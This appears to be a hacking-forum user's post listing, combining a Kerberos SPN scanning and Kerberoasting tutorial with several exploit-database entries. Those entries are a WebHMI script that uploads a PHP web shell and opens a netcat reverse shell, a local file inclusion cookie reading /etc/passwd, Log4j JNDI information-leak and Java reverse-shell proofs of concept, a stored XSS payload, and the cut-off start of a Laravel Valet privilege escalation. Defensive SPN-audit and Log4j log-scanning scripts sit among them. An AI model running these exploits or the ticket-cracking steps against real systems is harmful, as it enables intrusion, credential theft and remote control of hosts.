
Everything posted by HireHackking
-
Title: A detailed explanation of Kerberos SPNs
0x01 SPN definition

A Service Principal Name (SPN) is the name of a service instance that a Kerberos client uses to uniquely identify a particular Kerberos target computer. Kerberos authentication uses the SPN to associate a service instance with a service logon account. If multiple service instances are installed on computers throughout the forest, each instance must have its own SPN. A given service instance can have multiple SPNs if there are multiple names that clients can use to authenticate to it. For example, an SPN always includes the name of the host on which the service instance runs, so a service instance can register an SPN for each name or alias of its host.

0x02 SPN scanning

SPN scanning could also be called scanning for Kerberos service instance names. The best way to discover services in an Active Directory environment is "SPN scanning": locating services by requesting service principal names of a specific SPN type. The main advantage of SPN scanning for an attacker over a network port scan is that it does not require connecting to every IP on the network to check service ports. SPN scanning performs service discovery through LDAP queries to a domain controller. Because SPN queries are part of normal Kerberos ticket behaviour they are hard to detect, whereas a network port scan is easy to spot.

1. SPN format

spn = serviceclass "/" hostname [":" port] ["/" servicename]
ServiceClass = MSSQL
servicename = sql.bk.com

Where:
ServiceClass: a string identifying the class of service, such as www for a web service.
hostname: a string that is the name of the system. This should be a fully qualified domain name (FQDN).
port: a number that is the port number of the service.
servicename: a string that is the distinguished name (DN), objectGuid, Internet host name, or fully qualified domain name (FQDN) of the service.

Note: the service class and host are required parameters; the port and service name are optional. The colon between host and port is required only when a port is present.

2. Common services and their SPN service instance names

MSSQL: MSSQLSvc/adsmssqlap01.adsecurity.org:1433
Exchange: exchangeMDB/adsmsexcas01.adsecurity.org
RDP: TERMSRV/adsmsexcas01.adsecurity.org
WSMan/WinRM/PS Remoting: WSMAN/adsmsexcas01.adsecurity.org
Hyper-V host: Microsoft Virtual Console Service/adsmshv01.adsecurity.org
VMware VCenter: STS/adsmsvc01.adsecurity.org

3. SPN scanning PowerShell scripts

Discover SPN service instance names for the MSSQL service:
https://github.com/pyrotek3/powershell-ad-recon/blob/master/discover-psmssqlservers
Queries for other SPN service instance names:
https://github.com/pyrotek3/powershell-ad-recon

Because every server must register its SPNs with the Kerberos authentication service, this provides an excellent way to gather information about an environment without running a port scan.

For example: an administrator installs and configures Microsoft SQL Server on a server named "MetCorpKCS17", with SQL instances listening on ports 3170 and 3171. The service class and instance names are then generated as follows:

MSSQLSvc/MetCorpKCS17.adsecurity.org:3170
MSSQLSvc/MetCorpKCS17.adsecurity.org:3171

Here MSSQLSvc is the service class, MetCorpKCS17.adsecurity.org is the computer's FQDN, and the trailing number is the network port. Since Kerberos simply matches the requested SPN against SPNs that already exist in the directory, the last number is not necessarily a port on the server; as shown above, the port recorded in an SPN is in most cases the listening port on the server, but not every SPN includes a port. We now have a better way to discover SQL servers in an Active Directory domain or forest: servicePrincipalName=MSSQL*

0x03 SPN scanning and cracking TGS tickets, using the MSSQL service SPN configuration as the example

Reference configuration: https://technet.microsoft.com/zh-cn/library/bb735885.aspx

1. Register the SPN for the SQL Server service account
Manual registration:
setspn -A MSSQLSvc/myhost.redmond.microsoft.com:1433 accountname
For a named instance:
setspn -A MSSQLSvc/myhost.redmond.microsoft.com/instancename accountname

2. Check the SPNs registered on the user:
setspn -L ruos\sql-service

3. Use ADSI Edit (adsiedit.msc) to view the user's attributes.

4. Grant the user the service logon right in AD:
gpo_name\Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment: Log on as a service

5. Change the SQL Server service account to the domain user account.

6. Brute-forcing the Kerberos TGS ticket
When the encryption type is RC4_HMAC_MD5, the fourth step of the Kerberos protocol, TGS-REP, returns a ticket encrypted with the NTLM password hash of the service account.

7. SPN scanning
setspn -T domain -Q */*
or https://github.com/pyrotek3/powershell-ad-recon/

8. Request a Kerberos ticket for the SPN
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/webtst01.ruos.org/sqlexpress'

9. View and export tickets
The default encryption type is AES256_HMAC, which tgsrepcrack cannot crack. The encryption type can be set to RC4_HMAC_MD5 through the server's group policy:
gpo_name\Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options: Network security: Configure encryption types allowed for Kerberos

10. Offline cracking
Use tgsrepcrack (RC4_HMAC_MD5 only), or save the hash and crack it with hashcat.
Export the hash (for other encryption types):
GetUserSPNs.py -request -outputfile hash.txt -dc-ip 192.168.6.2 ruos.org/user2
Or export it from the ticket with kirbi2john.py:
1-40A00000-USER2@MSSQLSVC~webtst01.ruos.org~sqlexpress-ruos.org.kirbi
hashcat64.exe -m 13100 hash.txt emple.dict --force

Other cracking tools:
https://github.com/nidem/kerberoast
https://github.com/coresecurity/impacket
https://github.com/nidem/kerberoast/blob/master/kirbi2john.py

0x04 Comprehensive reference table of Active Directory Service Principal Names (SPNs)

AcronisAgent: Acronis backup and data recovery software
ADtServer: Microsoft System Center Operations Manager (2007/2012) management server with ACS
afpserver: Apple Filing Protocol
AgpmServer: Microsoft Advanced Group Policy Management (AGPM)
aradminsvc: Quest ActiveRoles Server
arssvc: Quest ActiveRoles Server
BOCMS: Business Objects CMS
BOSSO: Business Objects
CESREMOTE: Associated with Citrix VDI solutions on VMware; many VDI workstations have this SPN
cifs: Common Internet File System
CmRcService: Microsoft System Center Configuration Manager (SCCM) Remote Control
CUSessionKeySvr: Cisco Unity VoIP system
cvs: CVS repository
DFSR*: Distributed File System Replication
DNS: Domain Name Server
E3514235-4B06-11D1-AB04-00C04FC2DCD2: NTDS DC RPC replication
E3514235-4B06-11D1-AB04-00C04FC2DCD2-ADAM: ADAM instance
EDVR: ExacqVision Service
exchangeAB: Exchange Address Book service (NSPI; usually every domain controller that is a GC)
exchangeMDB: RPC Client Access server role
exchangeRFR: Exchange Address Book service
FCSVR: Apple Final Cut Server
filerepservice: wsfilerepservice.exe
FIMService: Microsoft Forefront Identity Manager (FIM)
ftp: File Transfer Protocol
GC: Domain Controller Global Catalog service
HDFS: Hadoop (Ambari)
HOST: The host service represents the host computer. The HOST SPN is used to access the host computer account whose long-term key is used by the Kerberos protocol when it creates a service ticket.
HTTP: SPN for HTTP web services that support Kerberos authentication
Hyper-V Replica Service: Microsoft Hyper-V Replica Service
IMAP: Internet Message Access Protocol
IMAP4: Internet Message Access Protocol version 4
ipp: Internet Printing Protocol
iSCSITarget: iSCSI configuration
kadmin: Kerberos
ldap: LDAP services such as domain controllers and ADAM instances
MAGFS: Maginatics MagFS
MapRed: Cloudera
Microsoft Virtual Console Service: Hyper-V host
Microsoft Virtual System Migration Service: P2V support (Hyper-V)
mongod: MongoDB Enterprise
mongos: MongoDB Enterprise
MSClusterVirtualServer: Windows Cluster Server
MSOLAPSvc: SQL Server Analysis Services
MSOLAPSvc.3: SQL Server Analysis Services
MSOLAPDisco.3: SQL Server Analysis Services
MSOMHSVC: Microsoft System Center Operations Manager (2007/2012) management server
MSOMSdkSvc: Microsoft System Center Operations Manager (2007/2012) management server
MSServerCluster: Windows Cluster Server
MSServerClusterMgmtAPI: The Cluster API requires this SPN to authenticate to the server using Kerberos
MSSQL: Microsoft SQL Server
MSSQLSvc: Microsoft SQL Server
MSSQL$ADOBECONNECT: Microsoft SQL Server supporting Adobe Connect
MSSQL$BIZTALK: Microsoft SQL Server supporting Microsoft BizTalk Server
MSSQL$BUSINESSOBJECTS: Microsoft SQL Server supporting Business Objects
MSSQL$DB01NETIQ: Microsoft SQL Server supporting NetIQ
nfs: Network File System
NPPolicyEvaluator: Dell Quest Change Auditor
NPRepository4(ChangeAuditor): Dell Quest Change Auditor
NPRepository4(CAAD): Dell Quest Change Auditor
NPRepository4(DEFAULT): Dell Quest Change Auditor
NtFrs*: NT File Replication Service
oracle: Oracle Kerberos authentication
pcast: Apple Podcast Producer
PCNSCLNT: Automatic password synchronization solution (MIIS 2003 & FIM)
POP: Post Office Protocol
POP3: Post Office Protocol version 3
PVSSOAP: Citrix Provisioning Services (7.1)
RestrictedKrbHost: Service class for SPNs whose service class string is "RestrictedKrbHost"; the service ticket's session key is shared using the computer account's key
RPC: Remote Procedure Call service
SAP: SAP/SAPService SID
sas: SAS server
SCVMM: System Center Virtual Machine Manager
secshd: IBM InfoSphere
SIP: Session Initiation Protocol
SMTP: Simple Mail Transfer Protocol
SMTPSVC: Simple Mail Transfer Protocol
SoftGrid: Microsoft Application Virtualization (App-V), formerly "SoftGrid"
STS: VMware SSO service
SQLAgent$DB01NETIQ: SQL service for NetIQ
tapinego: Associated with routing applications such as Microsoft Firewall (ISA, TMG, etc.)
TERMSRV: Microsoft Remote Desktop Protocol service, also known as Terminal Services
tnetd: Juniper Kerberos authentication ("tnetd is a daemon used for internal communication between various components such as the Routing Engine and the Packet Forwarding Engine")
vmrc: Microsoft Virtual Server 2005
vnc: VNC server
vpn: Virtual Private Network
vProRecovery Backup Exec System Recovery Agent 7.0
vProRecovery Backup Exec System Recovery Agent 8.0
vProRecovery Backup Exec System Recovery Agent 9.0
vProRecovery Norton Ghost 12.0
vProRecovery Norton Ghost 14.0
vProRecovery Norton Ghost 15.0
vProRecovery Symantec System Recovery Agent 10.0
vProRecovery Symantec System Recovery Agent 11.0
vProRecovery Symantec System Recovery Agent 14.0
vssrvc: Microsoft Virtual Server (2005)
WSMAN: Windows Remote Management (based on the WS-Management standard) service
xmpp/XMPP: Extensible Messaging and Presence Protocol (Jabber)
Xgrid: Apple distributed (grid) computing / Mac OS X 10.6 Server administration
Yarn: Cloudera MapReduce
Note: domain controllers automatically map common SPNs to the HOST SPN. When a computer is joined to the domain, the HOST SPN is automatically added to the servicePrincipalName attribute of every computer account. Domain controller SPN mapping is controlled by the sPNMappings attribute of CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration.

SPNs automatically mapped to HOST (the sPNMappings attribute value):
alerter, appmgmt, cisvc, clipsrv, browser, dhcp, dnscache, replicator, eventlog, eventsystem, policyagent, oakley, dmserver, dns, mcsvc, fax, msiserver, ias, messenger, netlogon, netman, netdde, netddedsm, nmagent, plugplay, protectedstorage, rasman, rpclocator, rpc, rpcss, remoteaccess, rsvp, samss, scardsvr, scesrv, seclogon, scm, dcom, cifs, spooler, snmp, schedule, tapisrv, trksvr, trkwks, ups, time, wins, www, http, w3svc, iisadmin, msdtc
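The following is an added, defender-side example (not part of the original article): a parser for the SPN format described above, plus an inventory check over the accounts that register SPNs, flagging malformed entries, non-FQDN hosts, one SPN registered on two accounts, and user accounts with SPNs whose service tickets would still be issued with RC4_HMAC_MD5 rather than AES. The account records, the `Account` fields and the `supports_aes` flag are constructed assumptions; in practice they would be populated from an LDAP query for servicePrincipalName=* together with msDS-SupportedEncryptionTypes.

```python
"""Defender-side SPN inventory for the format given in the article:
    spn = serviceclass "/" hostname [":" port] ["/" servicename]
Service class and host are required, port and service name are optional, and the
colon is only valid when a port follows. The accounts below are constructed sample
data; in production they would come from an LDAP query for servicePrincipalName=*."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass(frozen=True)
class SPN:
    service_class: str
    hostname: str
    port: Optional[int] = None
    service_name: Optional[str] = None


def parse_spn(raw: str) -> SPN:
    """Split one SPN into its components, rejecting strings that break the format."""
    service_class, sep, rest = raw.partition("/")
    if not sep or not service_class or not rest:
        raise ValueError("SPN needs the form serviceclass/hostname")
    host_part, _, service_name = rest.partition("/")
    hostname, colon, port_text = host_part.partition(":")
    if not hostname:
        raise ValueError("hostname is required")
    port = None
    if colon:  # a colon is only legal when a port follows it
        if not port_text.isdigit() or not 1 <= int(port_text) <= 65535:
            raise ValueError("port must be a number between 1 and 65535")
        port = int(port_text)
    return SPN(service_class, hostname, port, service_name or None)


@dataclass
class Account:
    sam_account_name: str
    is_computer: bool      # computer accounts carry long, regularly rotated passwords
    supports_aes: bool     # assumption: msDS-SupportedEncryptionTypes allows AES
    spns: List[str] = field(default_factory=list)


def audit_spns(accounts: List[Account]) -> Dict[str, List[str]]:
    """Flag malformed SPNs, non-FQDN hosts, one SPN on two accounts (which breaks
    Kerberos auth for that service), user accounts with SPNs and, among those,
    accounts whose tickets would use RC4_HMAC_MD5 because AES is not enabled."""
    findings: Dict[str, List[str]] = {
        "malformed": [], "short_hostname": [], "duplicate": [],
        "user_account_spn": [], "rc4_only": [],
    }
    owner_by_spn: Dict[str, str] = {}
    for acct in accounts:
        for raw in acct.spns:
            try:
                spn = parse_spn(raw)
            except ValueError as exc:
                findings["malformed"].append(f"{acct.sam_account_name}: {raw} ({exc})")
                continue
            if "." not in spn.hostname:
                findings["short_hostname"].append(f"{acct.sam_account_name}: {raw}")
            key = raw.lower()  # SPN comparison is case-insensitive
            if key in owner_by_spn and owner_by_spn[key] != acct.sam_account_name:
                findings["duplicate"].append(
                    f"{raw} on {owner_by_spn[key]} and {acct.sam_account_name}")
            owner_by_spn.setdefault(key, acct.sam_account_name)
        if acct.spns and not acct.is_computer:
            findings["user_account_spn"].append(acct.sam_account_name)
            if not acct.supports_aes:
                findings["rc4_only"].append(acct.sam_account_name)
    return findings


def group_by_service_class(accounts: List[Account]) -> Dict[str, List[str]]:
    """The 'SPN scan' view of the directory: which hosts advertise which service class."""
    groups: Dict[str, List[str]] = {}
    for acct in accounts:
        for raw in acct.spns:
            try:
                spn = parse_spn(raw)
            except ValueError:
                continue
            groups.setdefault(spn.service_class.lower(), []).append(spn.hostname.lower())
    return groups


# Constructed sample inventory; host names borrowed from the article's examples.
SAMPLE_ACCOUNTS = [
    Account("ADSMSSQLAP01$", True, True,
            ["MSSQLSvc/adsmssqlap01.adsecurity.org:1433", "HOST/adsmssqlap01.adsecurity.org"]),
    Account("ADSMSEXCAS01$", True, True,
            ["exchangeMDB/adsmsexcas01.adsecurity.org", "TERMSRV/adsmsexcas01.adsecurity.org"]),
    Account("sql-service", False, False,
            ["MSSQLSvc/webtst01.ruos.org/sqlexpress", "MSSQLSvc/webtst01:1433"]),
    Account("svc-web", False, True,
            ["HTTP/intranet.adsecurity.org", "HTTP/intranet.adsecurity.org:abc"]),
    Account("svc-web-old", False, True, ["http/intranet.adsecurity.org"]),
]
```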
-
WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 12/12/2021
# Exploit Author: Jeremiasz Pluta
# Vendor Homepage: https://webhmi.com.ua/en/
# Version: WebHMI Firmware < 4.1
# CVE: CVE-2021-43936
# Tested on: WebHMI Firmware 4.0.7475

#!/usr/bin/python
import argparse
import subprocess
import time

import pyfiglet
import requests

banner = pyfiglet.figlet_format("CVE-2021-43936")
print(banner)
print('Exploit for CVE-2021-43936')
print('For: WebHMI Firmware < 4.1')

login = "admin"     # CHANGE ME IF NEEDED
password = "admin"  # CHANGE ME IF NEEDED


class Exploit:
    def __init__(self, target_ip, target_port, localhost, localport):
        self.target_ip = target_ip
        self.target_port = target_port
        self.localhost = localhost
        self.localport = localport

    def exploitation(self):
        # PHP file placed through the unrestricted upload in files.php
        payload = """<?php system($_GET['cmd']); ?>"""
        # URL-encoded command passed to the uploaded file's cmd parameter
        payload2 = ("rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+"
                    + self.localhost + "+" + self.localport + "+>/tmp/f")
        headers_login = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
            'Accept': 'application/json, text/javascript, */*; q=0.01',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'application/json',
            'X-WH-LOGIN': login,
            'X-WH-PASSWORD': password,
            'X-Requested-With': 'XMLHttpRequest',
            'Connection': 'close',
            'Content-Length': '0'
        }
        url = 'http://' + self.target_ip + ':' + self.target_port
        r = requests.Session()

        print('[*] Resolving URL...')
        r1 = r.get(url)
        time.sleep(3)

        print('[*] Trying to log in...')
        r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True)
        time.sleep(3)

        print('[*] Login redirection...')
        login_cookies = {
            'X-WH-SESSION-ID': r2.headers['X-WH-SESSION-ID'],
            'X-WH-CHECK-TRIAL': 'true',
            'il18next': 'en',
        }
        r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',
                    cookies=login_cookies)
        time.sleep(3)

        print('[*] Uploading cmd.php file...')
        files = {'file': ('cmd.php', payload, 'application/x-php')}
        r4 = r.post(url + '/files.php', files=files, cookies=login_cookies)
        time.sleep(3)

        print('[*] Setting up netcat listener...')
        listener = subprocess.Popen(["nc", "-nvlp", self.localport])
        time.sleep(3)

        print('[*] Executing reverse shell...')
        print('[*] Watchout for shell! :)')
        r5 = r.get(url + '/uploads/files/cmd.php?cmd=' + payload2, cookies=login_cookies)
        if r5.status_code == 200:
            print('[*] Got shell!')
            while True:
                listener.wait()
        else:
            print('[-] Something went wrong!')
            listener.terminate()


def get_args():
    parser = argparse.ArgumentParser(
        description='WebHMI Firmware <4.1 Unrestricted File Upload + Code Execution (Authenticated)')
    parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
    parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
    parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store',
                        help='Local listening IP')
    parser.add_argument('-P', '--localport', dest="localport", required=True, action='store',
                        help='Local listening port')
    return parser.parse_args()


args = get_args()
exp = Exploit(args.url, args.target_port, args.localhost, args.localport)
exp.exploitation()
-
HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)
# Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)
# Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0"
# Date: 11/12/2021
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: N/A
# Version: V2.0
# Tested on: Nginx NVRDVRIPC Web Server

Proof of Concept:

GET /language/lang HTTP/1.1
Referer: http://example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: VulnIP
Connection: Keep-alive
-
Apache Log4j2 2.14.1 - Information Disclosure
# Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure
# Date: 12/12/2021
# Exploit Author: leonjza
# Vendor Homepage: https://logging.apache.org/log4j/2.x/
# Version: <= 2.14.1
# CVE: CVE-2021-44228

#!/usr/bin/env python3
# Pure python ENV variable leak PoC for CVE-2021-44228
# Original PoC: https://twitter.com/Black2Fan/status/1470281005038817284
#
# 2021 @leonjza

import argparse
import socketserver
import threading
import time

import requests

# Minimal LDAP BindResponse so the vulnerable JVM proceeds to send its search request
LDAP_HEADER = b'\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00\x0a'


class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
    def handle(self) -> None:
        print(f' i| new connection from {self.client_address[0]}')
        sock = self.request
        sock.recv(1024)
        sock.sendall(LDAP_HEADER)
        data = sock.recv(1024)
        data = data[9:]  # strip header

        # example response
        #
        # ('Java version 11.0.13\n'
        #  '\x01\x00\n'
        #  '\x01\x03\x02\x01\x00\x02\x01\x00\x01\x01\x00\x0b'
        #  'objectClass0\x00\x1b0\x19\x04\x172.16.840.1.113730.3.4.2')

        data = data.decode(errors='ignore').split('\n')[0]
        print(f' v| extracted value: {data}')


class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    pass


def main():
    parser = argparse.ArgumentParser(description='a simple log4j <=2.14 information disclosure poc '
                                                 '(ref: https://twitter.com/Black2Fan/status/1470281005038817284)')
    parser.add_argument('--target', '-t', required=True, help='target uri')
    parser.add_argument('--listen-host', default='0.0.0.0',
                        help='exploit server host to listen on (default: 0.0.0.0)')
    # type=int so a port given on the command line is usable as a socket address
    parser.add_argument('--listen-port', '-lp', type=int, default=8888,
                        help='exploit server port to listen on (default: 8888)')
    parser.add_argument('--exploit-host', '-eh', required=True, default='127.0.0.1',
                        help='host where (this) exploit server is reachable')
    parser.add_argument('--leak', '-l', default='${java:version}',
                        help='value to leak. see: https://twitter.com/Rayhan0x01/status/1469571563674505217 '
                             '(default: ${java:version})')
    args = parser.parse_args()

    print(f' i| starting server on {args.listen_host}:{args.listen_port}')
    server = ThreadedTCPServer((args.listen_host, args.listen_port), ThreadedTCPRequestHandler)
    serv_thread = threading.Thread(target=server.serve_forever)
    serv_thread.daemon = True
    serv_thread.start()
    time.sleep(1)
    print(f' i| server started')

    payload = f'${{jndi:ldap://{args.exploit_host}:{args.listen_port}/{args.leak}}}'
    print(f' i| sending exploit payload {payload} to {args.target}')

    try:
        r = requests.get(args.target, headers={'User-Agent': payload})
        print(f' i| response status code: {r.status_code}')
        print(f' i| response: {r.text}')
    except Exception as e:
        print(f' e| failed to make request: {e}')
    finally:
        server.shutdown()
        server.server_close()


if __name__ == '__main__':
    main()
-
WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated)
# Exploit Title: WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 29/11/2021
# Exploit Author: Mansi Singh
# Vendor Homepage: https://wordpress.org/plugins/typebot/
# Software Link: https://wordpress.org/plugins/typebot/
# Tested on: Windows
# Reference: https://wpscan.com/vulnerability/2bde2030-2dfe-4dd3-afc1-36f7031a91ea

How to reproduce the vulnerability:

1. Install the latest WordPress.
2. Install and activate Typebot version 1.4.3.
3. Navigate to Typebot settings and enter the payload into 'Publish ID or Full URL'.
4. Enter the JavaScript payload mentioned below:
   "><img src=x onerror=confirm(1)>
5. You will observe that the payload is stored in the database; when the same functionality is triggered, the JavaScript payload executes and a pop-up appears.
-
Apache Log4j 2 - Remote Code Execution (RCE)
# Exploit Title: Apache Log4j 2 - Remote Code Execution (RCE)
# Date: 11/12/2021
# Exploit Authors: kozmer, z9fr, svmorris
# Vendor Homepage: https://logging.apache.org/log4j/2.x/
# Software Link: https://github.com/apache/logging-log4j2
# Version: versions 2.0-beta-9 and 2.14.1.
# Tested on: Linux
# CVE: CVE-2021-44228
# Github repo: https://github.com/kozmer/log4j-shell-poc

import argparse
import subprocess
import sys
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler

from colorama import Fore, init

init(autoreset=True)


def listToString(s):
    # argparse collects nargs='+' values as a list; join them back into one string
    str1 = ""
    try:
        for ele in s:
            str1 += ele
        return str1
    except Exception:
        parser.print_help()
        sys.exit()


def payload(userip, webport, lport):
    genExploit = ("""
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Exploit {
    public Exploit() throws Exception {
        String host="%s";
        int port=%s;
        String cmd="/bin/sh";
        Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
        Socket s=new Socket(host,port);
        InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
        OutputStream po=p.getOutputStream(),so=s.getOutputStream();
        while(!s.isClosed()) {
            while(pi.available()>0) so.write(pi.read());
            while(pe.available()>0) so.write(pe.read());
            while(si.available()>0) po.write(si.read());
            so.flush();
            po.flush();
            Thread.sleep(50);
            try {
                p.exitValue();
                break;
            } catch (Exception e){ }
        };
        p.destroy();
        s.close();
    }
}
""") % (userip, lport)

    # writing the exploit to Exploit.java file
    try:
        with open("Exploit.java", "w") as f:
            f.write(genExploit)
        print(Fore.GREEN + '[+] Exploit java class created success')
    except Exception as e:
        print(Fore.RED + f'[-] Something went wrong {e}')

    checkJavaAvailible()
    print(Fore.GREEN + '[+] Setting up fake LDAP server\n')

    # create the LDAP server on new thread
    t1 = threading.Thread(target=createLdapServer, args=(userip, webport))
    t1.start()

    # start the web server
    httpd = HTTPServer(('localhost', int(webport)), SimpleHTTPRequestHandler)
    httpd.serve_forever()


def checkJavaAvailible():
    # the bundled JDK is expected at ./jdk1.8.0_20 inside the repository
    try:
        javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version'],
                                  stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
    except FileNotFoundError:
        javaver = 1
    if javaver != 0:
        print(Fore.RED + '[-] Java is not installed inside the repository ')
        sys.exit()


def createLdapServer(userip, lport):
    sendme = ("${jndi:ldap://%s:1389/a}") % (userip)
    print(Fore.GREEN + "[+] Send me: " + sendme + "\n")

    subprocess.run(["./jdk1.8.0_20/bin/javac", "Exploit.java"])
    url = "http://{}:{}/#Exploit".format(userip, lport)
    subprocess.run(["./jdk1.8.0_20/bin/java", "-cp", "target/marshalsec-0.0.3-SNAPSHOT-all.jar",
                    "marshalsec.jndi.LDAPRefServer", url])


def header():
    print(Fore.BLUE + """
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
""")


if __name__ == "__main__":
    header()
    try:
        parser = argparse.ArgumentParser(description='please enter the values ')
        parser.add_argument('--userip', metavar='userip', type=str, nargs='+',
                            help='Enter IP for LDAPRefServer & Shell')
        parser.add_argument('--webport', metavar='webport', type=str, nargs='+',
                            help='listener port for HTTP port')
        parser.add_argument('--lport', metavar='lport', type=str, nargs='+', help='Netcat Port')
        args = parser.parse_args()
        # print(args.userip)
        payload(listToString(args.userip), listToString(args.webport), listToString(args.lport))
    except KeyboardInterrupt:
        print(Fore.RED + "user interrupted the program.")
        sys.exit(0)
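Both Log4j entries above (the `${java:version}` leak and the `${jndi:ldap://...:1389/a}` RCE PoC) deliver their lookup through a logged header such as User-Agent. As an added example from the detection side, not part of either PoC, the following scans access-log lines for CVE-2021-44228 lookup strings, normalising URL-encoding and the common `${lower:j}` / `${::-j}` nesting, and extracts the callback host:port for egress blocking and triage. The log lines, the set of normalised nesting forms, and the 203.0.113.0/24 addresses are constructed for the example.

```python
"""Detection logic for CVE-2021-44228 lookup strings in web server access logs.
The PoCs above deliver a ${jndi:...} lookup through a logged header such as
User-Agent; this normalises URL-encoding and simple nested lookups, finds the
lookup, and extracts the callback host for triage and blocking. The access log
lines below are constructed sample data."""
import re
from typing import List, NamedTuple
from urllib.parse import unquote

# Nested lookups used to break up the literal "jndi": ${lower:j}, ${upper:J} and
# ${anything:-j} (default-value syntax). Assumption: only these simple forms are handled.
_NESTED = re.compile(r"\$\{(?:lower|upper):([^}$]*)\}|\$\{[^}$]*:-([^}$]*)\}", re.IGNORECASE)

# A resolved lookup: ${jndi:<scheme>://<host[:port]><optional path>}; the path may
# itself contain a lookup such as ${java:version} (the information-disclosure PoC).
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:\s*//\s*([^/\s}]+)"
    r"(/(?:\$\{[^}]*\}|[^}\s])*)?",
    re.IGNORECASE,
)


class Finding(NamedTuple):
    line_no: int
    scheme: str
    callback: str   # host[:port] the vulnerable JVM would connect back to
    path: str
    matched: str


def normalize(text: str) -> str:
    """URL-decode, then collapse nested lookups until nothing changes."""
    text = unquote(text)
    previous = None
    while previous != text:
        previous = text
        text = _NESTED.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
    return text


def scan(lines: List[str]) -> List[Finding]:
    """Return one Finding per JNDI lookup seen in the given log lines."""
    findings: List[Finding] = []
    for number, line in enumerate(lines, start=1):
        for m in _JNDI.finditer(normalize(line)):
            findings.append(Finding(number, m.group(1).lower(), m.group(2), m.group(3) or "", m.group(0)))
    return findings


def callback_endpoints(findings: List[Finding]) -> List[str]:
    """Unique host[:port] values to hand to egress filtering or threat intel."""
    return sorted({f.callback for f in findings})


# Constructed access-log lines (combined log format); 203.0.113.0/24 is documentation space.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [12/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:8888/${java:version}}"',
    '10.0.0.9 - - [12/Dec/2021:10:01:09 +0000] "GET /a HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.7 - - [12/Dec/2021:10:02:31 +0000] "GET /%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A//203.0.113.11%3A1099/x%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.3 - - [12/Dec/2021:10:03:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 ${date:yyyy}"',
]
```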
-
Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)
# Exploit Title: Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)
# Exploit Author: leonjza
# Vendor Homepage: https://laravel.com/docs/8.x/valet
# Version: v1.1.4 to v2.0.3

#!/usr/bin/env python2

# Laravel Valet v1.1.4 - 2.0.3 Local Privilege Escalation (macOS)
# February 2017 - @leonjza

# Affected versions: At least since ~v1.1.4 to v2.0.3. Yikes.
# Reintroduced in v2.0.7 via the 'trust' command again.

# This bug got introduced when the sudoers files got added around
# commit b22c60dacab55ffe2dc4585bc88cd58623ec1f40 [1].

# Effectively, when the valet command is installed, composer will symlink [2]
# the `valet` command to /usr/local/bin. This 'command' is writable by the user
# that installed it.
#
# ~ $ ls -lah $(which valet)
# lrwxr-xr-x  1 leonjza  admin    51B Feb 25 00:09 /usr/local/bin/valet -> /Users/leonjza/.composer/vendor/laravel/valet/valet

# Running `valet install`, will start the install [3] routine. The very first action
# taken is to stop nginx (quietly?) [4], but runs the command with `sudo` which
